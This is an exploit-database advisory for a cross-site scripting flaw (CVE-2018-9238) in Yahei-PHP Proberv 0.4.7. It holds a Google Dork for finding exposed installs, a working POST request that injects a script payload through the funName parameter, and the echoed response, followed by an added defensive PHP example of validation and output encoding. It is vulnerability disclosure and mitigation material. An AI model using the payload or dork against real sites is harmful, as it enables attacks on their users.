ID 1337DAY-ID-30145
Type zdt
Reporter ManhNho
Modified 2018-04-09T00:00:00
Description
Exploit for php platform in category web applications
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Description
-----------------------------------------------------
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.
#2. Proof of Concept
-----------------------------------------------------
Request:
POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1

pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=
-----------------------------------------------------
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function
Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results
support the position: 错误')</script></table>
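Added example, not part of the original advisory and not the vendor's code: the response above shows the funName value landing inside a single-quoted JavaScript string in a <script> block. The PHP below shows the two server-side controls for that sink, shape validation of the parameter and context-aware encoding at output. The helper names and message text are hypothetical, since the source of proberv.php is not shown on this page.

```php
<?php
// Added example: hypothetical helpers, not code from proberv.php.

// funName is meant to be a PHP function name, so allow-list its shape
// (ASCII identifier, bounded length) before using it anywhere.
function is_function_name(string $s): bool
{
    return preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $s) === 1;
}

// Encode a value for a JavaScript string literal inside <script>.
// The JSON_HEX_* flags turn < > & ' " into \u00XX escapes, so the value
// can close neither the string nor the script element.
function js_string(string $s): string
{
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
            | JSON_INVALID_UTF8_SUBSTITUTE
    );
}

// Build the result block with validation first and encoding at the sink.
function render_function_test(string $funName): string
{
    if (!is_function_name($funName)) {
        $msg = 'Function test: invalid function name';
    } else {
        $state = function_exists($funName) ? 'supported' : 'not supported';
        $msg = "Function {$funName}: {$state}";
    }
    return '<script>alert(' . js_string($msg) . ')</script>';
}

// Constructed inputs: the URL-decoded funName from the request above, and a
// legitimate function name.
$samples = ['\')</script><script>alert("1");</script>', 'mysqli_connect'];

foreach ($samples as $value) {
    echo render_function_test($value), "\n";
    // Encoding alone also neutralises the value if validation is bypassed.
    echo js_string($value), "\n";
}
```

Where the same value is written into HTML body or attribute context instead of a script block, htmlspecialchars() with ENT_QUOTES is the matching encoder.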
#3. References
-----------------------------------------------------
https://pastebin.com/ia7U4vi9
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238
# 0day.today [2018-04-11] #